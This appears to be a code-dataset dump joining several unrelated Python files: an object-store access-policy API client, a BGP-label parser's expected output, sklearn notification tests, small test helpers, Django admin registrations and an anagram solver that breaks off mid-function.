response_type='ObjectStoreAccessPolicyObjectStoreUserResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_object_store_access_policies(self, **kwargs):
"""
List object store access policies.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_object_store_access_policies(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter: The filter to be used for query.
:param list[str] ids: A comma-separated list of resource IDs. This cannot be provided together with the name or names query parameters.
        :param int limit: The maximum number of items to return; must be >= 0.
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param str sort: Sort the response by the specified fields (in descending order if '-' is appended to the field name).
:param int start: The offset of the first resource to return from a collection.
:param str token: An opaque token used to iterate over a collection. The token to use on the next request is returned in the `continuation_token` field of the result.
:return: ObjectStoreAccessPolicyResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_object_store_access_policies_with_http_info(**kwargs)
else:
(data) = self.list_object_store_access_policies_with_http_info(**kwargs)
return data
def list_object_store_access_policies_with_http_info(self, **kwargs):
"""
List object store access policies.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_object_store_access_policies_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter: The filter to be used for query.
:param list[str] ids: A comma-separated list of resource IDs. This cannot be provided together with the name or names query parameters.
        :param int limit: The maximum number of items to return; must be >= 0.
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param str sort: Sort the response by the specified fields (in descending order if '-' is appended to the field name).
:param int start: The offset of the first resource to return from a collection.
:param str token: An opaque token used to iterate over a collection. The token to use on the next request is returned in the `continuation_token` field of the result.
:return: ObjectStoreAccessPolicyResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filter', 'ids', 'limit', 'names', 'sort', 'start', 'token']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_object_store_access_policies" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'filter' in params:
query_params.append(('filter', params['filter']))
if 'ids' in params:
query_params.append(('ids', params['ids']))
collection_formats['ids'] = 'csv'
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'names' in params:
query_params.append(('names', params['names']))
collection_formats['names'] = 'csv'
if 'sort' in params:
query_params.append(('sort', params['sort']))
if 'start' in params:
query_params.append(('start', params['start']))
if 'token' in params:
query_params.append(('token', params['token']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.12/object-store-access-policies', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ObjectStoreAccessPolicyResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_object_store_access_policies_object_store_users(self, **kwargs):
"""
List object store access policies for object store users.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_object_store_access_policies_object_store_users(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter: The filter to be used for query.
        :param int limit: The maximum number of items to return; must be >= 0.
:param list[str] policy_ids: A comma-separated list of policy IDs. This cannot be provided together with the policy names query parameters.
:param list[str] policy_names: A comma-separated list of policy names. This cannot be provided together with the policy ids query parameters.
:param list[str] member_ids: A comma-separated list of member ids. This cannot be provided together with the member names query parameters.
:param list[str] member_names: A comma-separated list of member names. This cannot be provided together with the member ids query parameters.
:param str sort: Sort the response by the specified fields (in descending order if '-' is appended to the field name).
:param int start: The offset of the first resource to return from a collection.
:param str token: An opaque token used to iterate over a collection. The token to use on the next request is returned in the `continuation_token` field of the result.
:return: ObjectStoreAccessPolicyObjectStoreUserResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_object_store_access_policies_object_store_users_with_http_info(**kwargs)
else:
(data) = self.list_object_store_access_policies_object_store_users_with_http_info(**kwargs)
return data
def list_object_store_access_policies_object_store_users_with_http_info(self, **kwargs):
"""
List object store access policies for object store users.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_object_store_access_policies_object_store_users_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter: The filter to be used for query.
        :param int limit: The maximum number of items to return; must be >= 0.
:param list[str] policy_ids: A comma-separated list of policy IDs. This cannot be provided together with the policy names query parameters.
:param list[str] policy_names: A comma-separated list of policy names. This cannot be provided together with the policy ids query parameters.
:param list[str] member_ids: A comma-separated list of member ids. This cannot be provided together with the member names query parameters.
:param list[str] member_names: A comma-separated list of member names. This cannot be provided together with the member ids query parameters.
:param str sort: Sort the response by the specified fields (in descending order if '-' is appended to the field name).
:param int start: The offset of the first resource to return from a collection.
:param str token: An opaque token used to iterate over a collection. The token to use on the next request is returned in the `continuation_token` field of the result.
:return: ObjectStoreAccessPolicyObjectStoreUserResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filter', 'limit', 'policy_ids', 'policy_names', 'member_ids', 'member_names', 'sort', 'start', 'token']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_object_store_access_policies_object_store_users" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'filter' in params:
query_params.append(('filter', params['filter']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'policy_ids' in params:
query_params.append(('policy_ids', params['policy_ids']))
collection_formats['policy_ids'] = 'csv'
if 'policy_names' in params:
query_params.append(('policy_names', params['policy_names']))
collection_formats['policy_names'] = 'csv'
if 'member_ids' in params:
query_params.append(('member_ids', params['member_ids']))
collection_formats['member_ids'] = 'csv'
if 'member_names' in params:
query_params.append(('member_names', params['member_names']))
collection_formats['member_names'] = 'csv'
if 'sort' in params:
query_params.append(('sort', params['sort']))
if 'start' in params:
query_params.append(('start', params['start']))
if 'token' in params:
query_params.append(('token', params['token']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.12/object-store-access-policies/object-store-users', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ObjectStoreAccessPolicyObjectStoreUserResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def remove_object_store_access_policies_object_store_users(self, **kwargs):
"""
Remove a policy from an object store user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.remove_object_store_access_policies_object_store_users(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] policy_ids: A comma-separated list of policy IDs. This cannot be provided together with the policy names query parameters.
:param list[str] policy_names: A comma-separated list of policy names. This cannot be provided together with the policy ids query parameters.
:param list[str] member_ids: A comma-separated list of member ids. This cannot be provided together with the member names query parameters.
:param list[str] member_names: A comma-separated list of member names. This cannot be provided together with the member ids query parameters.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.remove_object_store_access_policies_object_store_users_with_http_info(**kwargs)
else:
(data) = self.remove_object_store_access_policies_object_store_users_with_http_info(**kwargs)
return data
def remove_object_store_access_policies_object_store_users_with_http_info(self, **kwargs):
"""
Remove a policy from an object store user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.remove_object_store_access_policies_object_store_users_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] policy_ids: A comma-separated list of policy IDs. This cannot be provided together with the policy names query parameters.
:param list[str] policy_names: A comma-separated list of policy names. This cannot be provided together with the policy ids query parameters.
:param list[str] member_ids: A comma-separated list of member ids. This cannot be provided together with the member names query parameters.
:param list[str] member_names: A comma-separated list of member names. This cannot be provided together with the member ids query parameters.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['policy_ids', 'policy_names', 'member_ids', 'member_names']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method remove_object_store_access_policies_object_store_users" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'policy_ids' in params:
query_params.append(('policy_ids', params['policy_ids']))
collection_formats['policy_ids'] = 'csv'
if 'policy_names' in params:
query_params.append(('policy_names', params['policy_names']))
collection_formats['policy_names'] = 'csv'
if 'member_ids' in params:
query_params.append(('member_ids', params['member_ids']))
collection_formats['member_ids'] = 'csv'
if 'member_names' in params:
query_params.append(('member_names', params['member_names']))
collection_formats['member_names'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.12/object-store-access-policies/object-store-users', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
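Every method in the class above registers list-valued query parameters with `collection_formats['…'] = 'csv'`. The stand-alone sketch below illustrates what that registration amounts to when the request is serialized: each list is joined into a single comma-separated value. `serialize_query_params` is a hypothetical helper written for illustration, not a method of the SDK's `api_client`:

```python
def serialize_query_params(query_params, collection_formats):
    """Join list-valued query parameters whose collection format is 'csv'."""
    out = []
    for name, value in query_params:
        if collection_formats.get(name) == "csv" and isinstance(value, (list, tuple)):
            # e.g. policy_names=['p1', 'p2'] becomes ('policy_names', 'p1,p2')
            out.append((name, ",".join(str(v) for v in value)))
        else:
            out.append((name, value))
    return out

print(serialize_query_params(
    [("policy_names", ["p1", "p2"]), ("limit", 10)],
    {"policy_names": "csv"},
))  # → [('policy_names', 'p1,p2'), ('limit', 10)]
```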
# File: src/genie/libs/parser/nxos/tests/ShowBgpLabels/cli/equal/golden_output_3_expected.py
# Repo: balmasea/genieparser (license: Apache-2.0)
expected_output = {
'vrf':
{'VRF1':
{'address_family':
{'ipv6 unicast':
{'prefix':
{'2001:db8:4519::/112':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '492287',
'nexthop': '2001:db8:1c39:1::1:101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'2001:db8:4519::1:0/112':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '492287',
'nexthop': '2001:db8:1c39:1::1:101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'2001:db8:4519::2:0/112':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '492287',
'nexthop': '2001:db8:1c39:1::1:101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'2001:db8:4519::3:0/112':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '492287',
'nexthop': '2001:db8:1c39:1::1:101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'2001:db8:4519::4:0/112':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '492287',
'nexthop': '2001:db8:1c39:1::1:101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'2001:db8:4840::/112':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '21',
'nexthop': '::ffff:10.51.1.101',
'out_label': '16',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'2001:db8:4840::1:0/112':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '22',
'nexthop': '::ffff:10.51.1.101',
'out_label': '17',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'2001:db8:4840::2:0/112':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '23',
'nexthop': '::ffff:10.51.1.101',
'out_label': '18',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'2001:db8:4840::3:0/112':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '24',
'nexthop': '::ffff:10.51.1.101',
'out_label': '19',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'2001:db8:4840::4:0/112':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '25',
'nexthop': '::ffff:10.51.1.101',
'out_label': '20',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}}},
'router_id': '10.81.1.1',
'table_version': 18}}},
'default':
{'address_family':
{'ipv6 unicast':
{'prefix':
{'2001:db8:4410::/112':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': 'nolabel',
'nexthop': '2001:db8:1900:1::1:101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e'}}},
'2001:db8:4410::1:0/112':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': 'nolabel',
'nexthop': '2001:db8:1900:1::1:101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e'}}},
'2001:db8:4410::2:0/112':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': 'nolabel',
'nexthop': '2001:db8:1900:1::1:101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e'}}}},
'router_id': '10.1.1.1',
'table_version': 11}}}}}
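The golden output above nests vrf, address_family, prefix, and index keys. A small illustrative helper (not part of genieparser) showing how a consumer might pull one labelled-route entry out of such a structure; `sample_output` is a trimmed copy of the VRF1 data so the snippet stands alone:

```python
def get_label_entry(output, vrf, prefix, index=0):
    """Walk vrf -> address_family -> 'ipv6 unicast' -> prefix -> index."""
    return (
        output["vrf"][vrf]["address_family"]["ipv6 unicast"]
        ["prefix"][prefix]["index"][index]
    )

# Trimmed copy of the VRF1 data from the expected_output dictionary above.
sample_output = {
    "vrf": {"VRF1": {"address_family": {"ipv6 unicast": {"prefix": {
        "2001:db8:4840::/112": {"index": {0: {"in_label": "21", "out_label": "16"}}},
    }}}}},
}

entry = get_label_entry(sample_output, "VRF1", "2001:db8:4840::/112")
print(entry["in_label"], entry["out_label"])  # → 21 16
```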
# File: sdk/tests/test_sklearn.py (repo: fossabot/mlnotify, license: MIT)
from typing import Any
import pytest
from sklearn import datasets, svm, tree
import mlnotify # noqa: F401
from tests.utils import MockedNotifyPlugin
SKLearnSampleData = Any
@pytest.fixture
def sample_data() -> SKLearnSampleData:
return datasets.load_digits()
# svm
def test_sklearn_svm_svc_fit(sample_data: SKLearnSampleData, mocked_notify_plugin: MockedNotifyPlugin):
clf = svm.SVC()
clf.fit(sample_data.data[:-1], sample_data.target[:-1])
mocked_notify_plugin.before.assert_called_once()
mocked_notify_plugin.after.assert_called_once()
def test_sklearn_svm_svr_fit(sample_data: SKLearnSampleData, mocked_notify_plugin: MockedNotifyPlugin):
clf = svm.SVR()
clf.fit(sample_data.data[:-1], sample_data.target[:-1])
mocked_notify_plugin.before.assert_called_once()
mocked_notify_plugin.after.assert_called_once()
def test_sklearn_svm_oneclasssvm_fit(sample_data: SKLearnSampleData, mocked_notify_plugin: MockedNotifyPlugin):
clf = svm.OneClassSVM()
clf.fit(sample_data.data[:-1], sample_data.target[:-1])
mocked_notify_plugin.before.assert_called_once()
mocked_notify_plugin.after.assert_called_once()
def test_sklearn_svm_nusvc_fit(sample_data: SKLearnSampleData, mocked_notify_plugin: MockedNotifyPlugin):
clf = svm.NuSVC()
clf.fit(sample_data.data[:-1], sample_data.target[:-1])
mocked_notify_plugin.before.assert_called_once()
mocked_notify_plugin.after.assert_called_once()
def test_sklearn_svm_nusvr_fit(sample_data: SKLearnSampleData, mocked_notify_plugin: MockedNotifyPlugin):
clf = svm.NuSVR()
clf.fit(sample_data.data[:-1], sample_data.target[:-1])
mocked_notify_plugin.before.assert_called_once()
mocked_notify_plugin.after.assert_called_once()
def test_sklearn_svm_linearsvr_fit(sample_data: SKLearnSampleData, mocked_notify_plugin: MockedNotifyPlugin):
clf = svm.LinearSVR()
clf.fit(sample_data.data[:-1], sample_data.target[:-1])
mocked_notify_plugin.before.assert_called_once()
mocked_notify_plugin.after.assert_called_once()
def test_sklearn_svm_linearsvc_fit(sample_data: SKLearnSampleData, mocked_notify_plugin: MockedNotifyPlugin):
clf = svm.LinearSVC()
clf.fit(sample_data.data[:-1], sample_data.target[:-1])
mocked_notify_plugin.before.assert_called_once()
mocked_notify_plugin.after.assert_called_once()
# tree
def test_sklearn_tree_decisiontreeclassifier_fit(
sample_data: SKLearnSampleData, mocked_notify_plugin: MockedNotifyPlugin
):
clf = tree.DecisionTreeClassifier()
clf.fit(sample_data.data[:-1], sample_data.target[:-1])
mocked_notify_plugin.before.assert_called_once()
mocked_notify_plugin.after.assert_called_once()
def test_sklearn_tree_extratreeregressor_fit(sample_data: SKLearnSampleData, mocked_notify_plugin: MockedNotifyPlugin):
clf = tree.ExtraTreeRegressor()
clf.fit(sample_data.data[:-1], sample_data.target[:-1])
mocked_notify_plugin.before.assert_called_once()
mocked_notify_plugin.after.assert_called_once()
def test_sklearn_tree_extratreeclassifier_fit(sample_data: SKLearnSampleData, mocked_notify_plugin: MockedNotifyPlugin):
clf = tree.ExtraTreeClassifier()
clf.fit(sample_data.data[:-1], sample_data.target[:-1])
mocked_notify_plugin.before.assert_called_once()
mocked_notify_plugin.after.assert_called_once()
def test_sklearn_tree_decisiontreeregressor_fit(
sample_data: SKLearnSampleData, mocked_notify_plugin: MockedNotifyPlugin
):
clf = tree.DecisionTreeRegressor()
clf.fit(sample_data.data[:-1], sample_data.target[:-1])
mocked_notify_plugin.before.assert_called_once()
mocked_notify_plugin.after.assert_called_once()
| 33.333333 | 120 | 0.791892 | 475 | 3,700 | 5.770526 | 0.098947 | 0.124042 | 0.216709 | 0.120394 | 0.816855 | 0.816855 | 0.816855 | 0.816855 | 0.816855 | 0.816855 | 0 | 0.007576 | 0.108108 | 3,700 | 110 | 121 | 33.636364 | 0.82303 | 0.005135 | 0 | 0.544118 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.323529 | 1 | 0.176471 | false | 0 | 0.073529 | 0.014706 | 0.264706 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8e59133af2246862a5a06beabd235448042fd212 | 214 | py | Python | tests/dynamodb_generators.py | adisbladis/geostore | 79439c06b33414e1e26b3aa4b93a72fd7cbbae83 | [
"MIT"
] | 25 | 2021-05-19T08:05:07.000Z | 2022-03-14T02:48:58.000Z | tests/dynamodb_generators.py | adisbladis/geostore | 79439c06b33414e1e26b3aa4b93a72fd7cbbae83 | [
"MIT"
] | 311 | 2021-05-17T23:04:56.000Z | 2022-03-31T10:41:44.000Z | tests/dynamodb_generators.py | adisbladis/geostore | 79439c06b33414e1e26b3aa4b93a72fd7cbbae83 | [
"MIT"
] | 1 | 2022-01-03T05:38:32.000Z | 2022-01-03T05:38:32.000Z | from geostore.step_function import get_hash_key
from .stac_generators import any_dataset_id, any_dataset_version_id
def any_hash_key() -> str:
return get_hash_key(any_dataset_id(), any_dataset_version_id())
| 26.75 | 67 | 0.82243 | 35 | 214 | 4.514286 | 0.485714 | 0.253165 | 0.126582 | 0.189873 | 0.392405 | 0.392405 | 0.392405 | 0 | 0 | 0 | 0 | 0 | 0.107477 | 214 | 7 | 68 | 30.571429 | 0.827225 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0.25 | 1 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
8e6fa618d841791b21a5b5d78a2d6e4b5bdd4a09 | 103 | py | Python | p2prp/__init__.py | Li-Pro/P2P-Remote_Party | 120144e5fdacb30c77981e59d9d242e541178b89 | [
"Apache-2.0"
] | 1 | 2020-04-10T10:15:53.000Z | 2020-04-10T10:15:53.000Z | p2prp/__init__.py | Li-Pro/P2P-Remote-Party | 7aff94c3bf4dea8327b2b49a1f7dd5abe3c60bfe | [
"Apache-2.0"
] | null | null | null | p2prp/__init__.py | Li-Pro/P2P-Remote-Party | 7aff94c3bf4dea8327b2b49a1f7dd5abe3c60bfe | [
"Apache-2.0"
] | null | null | null | # import p2prp
from p2prp.main.clientMain import runClient
from p2prp.main.serverMain import runServer | 25.75 | 43 | 0.84466 | 14 | 103 | 6.214286 | 0.571429 | 0.206897 | 0.298851 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.032609 | 0.106796 | 103 | 4 | 44 | 25.75 | 0.913043 | 0.116505 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8e7c7aafbfee6d52e3891151a87c01f4609290d8 | 291 | py | Python | Codewars/8kyu/bin-to-decimal/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | 7 | 2017-09-20T16:40:39.000Z | 2021-08-31T18:15:08.000Z | Codewars/8kyu/bin-to-decimal/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | null | null | null | Codewars/8kyu/bin-to-decimal/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | null | null | null | # Python - 3.6.0
test.assert_equals(bin_to_decimal('0'), 0)
test.assert_equals(bin_to_decimal('1'), 1)
test.assert_equals(bin_to_decimal('10'), 2)
test.assert_equals(bin_to_decimal('11'), 3)
test.assert_equals(bin_to_decimal('101010'), 42)
test.assert_equals(bin_to_decimal('1001001'), 73)
| 32.333333 | 49 | 0.762887 | 52 | 291 | 3.923077 | 0.346154 | 0.294118 | 0.470588 | 0.558824 | 0.833333 | 0.833333 | 0.284314 | 0 | 0 | 0 | 0 | 0.109489 | 0.058419 | 291 | 8 | 50 | 36.375 | 0.635037 | 0.04811 | 0 | 0 | 0 | 0 | 0.069091 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d944cbe7fd8055d123ee45ff48b8e523251b06f4 | 213 | py | Python | siccodes/admin.py | skaaldig/siccodeapi | 6ea6841f79cc605799e2c302d8460ced332946e1 | [
"MIT"
] | 3 | 2019-01-17T17:40:36.000Z | 2019-04-26T18:49:41.000Z | siccodes/admin.py | skaaldig/siccodeapi | 6ea6841f79cc605799e2c302d8460ced332946e1 | [
"MIT"
] | null | null | null | siccodes/admin.py | skaaldig/siccodeapi | 6ea6841f79cc605799e2c302d8460ced332946e1 | [
"MIT"
] | null | null | null | from django.contrib import admin
from . import models
admin.site.register(models.IndustrySector)
admin.site.register(models.IndustryGroup)
admin.site.register(models.Industry)
admin.site.register(models.SicCode)
| 26.625 | 42 | 0.835681 | 28 | 213 | 6.357143 | 0.428571 | 0.202247 | 0.382022 | 0.516854 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.061033 | 213 | 7 | 43 | 30.428571 | 0.89 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
8dba496e98ed478d824ce44f82dd7c2bc1b947f8 | 6,065 | py | Python | A.py | VieVie31/anagram | 38f845675b887261330c6e055e47a15adebb6ecb | [
"MIT"
] | 1 | 2018-02-27T09:24:14.000Z | 2018-02-27T09:24:14.000Z | A.py | VieVie31/anagram | 38f845675b887261330c6e055e47a15adebb6ecb | [
"MIT"
] | null | null | null | A.py | VieVie31/anagram | 38f845675b887261330c6e055e47a15adebb6ecb | [
"MIT"
] | null | null | null | from time import *
from math import factorial
from collections import Counter
dictionary = open("ods.txt").readlines()
print("dictionary loaded...")
def check_word(reference, possible):
  """Equivalent of the ajout_possible function we wrote in the lab exercises."""
tmp = reference[:]
  for c in possible:  # are there enough characters left?
if c not in reference:
return False
else:
try:
tmp.remove(c)
      except ValueError:
return False
if tmp == []:
return True
else:
return tmp
nb_sols = 0
def A1(mon_mot):
  """Takes a word and, if the DEBUG flag is True, prints the list of anagrams
  of the input word; otherwise it only runs the computation and stores the
  number of solutions found in the global variable nb_sols."""
global nb_sols
def gen_anagram(anagram, possible_words):
    """The generator doing the real work: recursively produces the anagrams."""
for word in possible_words:
x = check_word(anagram, word)
if x == True:
yield [word]
elif x:
for y in gen_anagram(x, possible_words):
yield [word] + y
anagram = ''.join(sorted(mon_mot))
possible_words = set()
lexique = {}
for word in dictionary:
word = word.upper().strip()
key = ''.join(sorted(word))
    # build the lexicon
if key in lexique:
lexique[key].append(word)
else:
lexique[key] = [word]
    # keep pruning branches
tmp = list("".join(anagram.split()))
skip = False
for c in word:
if c not in anagram:
skip = True
continue
else:
try:
tmp.remove(c)
        except ValueError:
skip = True
continue
if skip:
continue
else:
      possible_words.add(key)  # store keys rather than words: smaller set, faster lookups
anagram = [x for x in anagram.strip() if x != ' ']
start = time()
res = set()
for x in gen_anagram(anagram, possible_words):
res.add(tuple(sorted(x)))
c = 0
for s in res:
t = 1
for k in s:
t *= len(lexique[k])
c += t
start = time() - start
nb_sols = c
if DEBUG:
    print("number of possible combinations:", c)
    print("found in:", start)
    print('=' * 30)
    print("solutions:")
def perms(L, sol=[]):
    "Rebuilds all the anagrams from the keys chosen by gen_anagram"
if len(L) == 1:
for v in lexique[L[0]]:
sol.append(v)
print(" ".join(sol))
sol.remove(v)
else:
k = L[-1]
for k in lexique[k]:
sol.append(k)
perms(L[:-1], sol)
sol.remove(k)
for L in res:
L = list(L)
if DEBUG:
perms(L)
def A2(mon_mot, nb_mots):
  """Takes a word and, if the DEBUG flag is True, prints the list of anagrams
